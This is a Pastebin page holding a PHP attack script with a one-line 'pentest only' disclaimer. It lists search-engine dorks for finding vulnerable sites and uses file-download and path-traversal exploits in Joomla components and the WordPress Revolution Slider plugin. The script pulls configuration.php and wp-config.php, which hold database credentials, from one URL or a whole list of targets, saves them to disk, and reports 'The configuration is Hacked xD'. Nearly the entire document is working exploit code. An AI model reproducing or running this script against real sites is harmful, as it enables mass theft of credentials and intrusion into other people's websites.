Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/php
- <?php
- /*
- Autor: Angel Cantu
- Mail: angel.cantu@sie-group.net
- DISCLAIMER
- This script only is for pentest using, don't use this code for alterate o attack websites
- DORKS
- inurl:'index.php?option=com_joomanager
- inurl:option=com_cckjseblod
- inurl:/wp-content/plugins/revslider/
- revslider.php 'index of
- inurl:force-download.php?file=wp-content/uploads
- inurl:wp-content/uploads inurl:force-download.php?file=
- */
- function fileOrUrl($a)
- {
- $r=0;
- $path= getcwd()."/"; # current path
- if( file_exists($path.$a) ) $r=1; # file with urls
- else
- {
- $out= parse_url($a);
- $r= ( ($out["scheme"] && $out["host"]) ? 2:0);
- unset($out);
- }
- unset($path);
- return $r;
- }
- function geturlname($a)
- {
- $patron= '/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/';
- preg_match_all($patron, $a, $buf);
- unset($patron);
- return $buf[2][0];
- }
- function getUrl($a)
- {
- $patron= '/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/';
- preg_match_all($patron, $a, $buf);
- unset($patron);
- return 'http'.($buf[1][0] ? 's':'').'://'.$buf[2][0];
- }
- function attackLibrary( $a )
- {
- $joomla= array(
- "name"=>"Joomla",
- "0"=>array(
- "name"=>"joom_manager",
- "exploit"=>"/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
- ),
- "1"=>array(
- "name"=>"joom_download",
- "exploit"=>"/index.php?option=com_cckjseblod&task=download&file=configuration.php"
- )
- );
- $wp= array(
- "name"=>"Wordpress",
- "0"=>array(
- "name"=>"wp_revslider",
- "exploit"=>"/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
- ),
- "1"=>array(
- "name"=>"wp_forcedownload",
- "exploit"=>"/force-download.php?file=wp-config.php"
- )
- );
- return (!strcmp($a, "w") ? $wp:$joomla);
- }
- function attackSend($mode, $target)
- {
- $path= getcwd()."/";
- $a= attackLibrary($mode);
- echo "\n** ". $a["name"]. " Attacking..\n";
- foreach( $a as $key=>$val )
- {
- if( strcmp($key, "name") )
- {
- echo "\n[". $val["name"]. "] Starting attack \"". $val["name"]. "\"..";
- # $cmd= "/usr/bin/curl \"".$target.$val["exploit"]."\" -O ".$path.$target."_".$key.".log";
- # system($cmd); # explot
- $buf= @file_get_contents($target.$val["exploit"]);
- $fp= fopen($path.geturlname($target)."_".$key.".log", "w");
- fwrite($fp, $buf);
- fclose($fp);
- if( !filesize($path.geturlname($target).'_'.$key.'.log') )
- echo "\n[ERROR] The config is protected..";
- else
- echo "\n[DONE] The configuration is Hacked xD";
- unset($cmd, $fp, $buf);
- }
- }
- return;
- }
- function cleanjump( $data )
- {
- return substr($data, 0, -1);
- }
- if( $argc!=4 )
- echo "\n[ERROR] Need argument, try: -a w URL";
- else
- {
- if( !($op=fileOrUrl($argv[3])) )
- echo "\n[ERROR] The argument isn't a file neither URL..";
- else
- {
- echo "\n[Done] You provide a ". ($op==1 ? "File with URLs":"URL Web");
- if( strcmp($argv[1], "-a") ) # not set attack type
- echo "\n[ERROR] You don't set attack type, use: \"-a w\" (wordpress) or \"-a j\" (joomla)";
- else if( strcmp($argv[2], "w") && strcmp($argv[2], "j") )
- echo "\n[ERROR] This script only use ttacks with: \"w\" (wordpress) or \"j\" (joomla)";
- else # done
- {
- if( $op==2 ) # url
- {
- $target= geturl($argv[3]); # cleaning
- $path= getcwd(). "/";
- echo "\n[URL] Target detected: ". $target;
- echo "\n[Path] Working on: ". $path;
- echo "\n\n";
- attackSend($argv[2], $target);
- }
- else # file
- {
- $fp= fopen($path.$argv[3], "r");
- $urls= array();
- while( ($buf=fgets($fp, (5*1024)))!==FALSE )
- $urls[]= cleanjump($buf);
- echo "\n[FILE] Detected: ". count($urls). " targets..";
- echo "\n[LIST] Targets List:\n";
- foreach( $urls as $key=>$val ) echo "\n". $val;
- foreach( $urls as $key=>$val ) attackSend($argv[2], $val);
- unset($urls);
- }
- }
- }
- }
- echo "\n\n";
- exit;
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement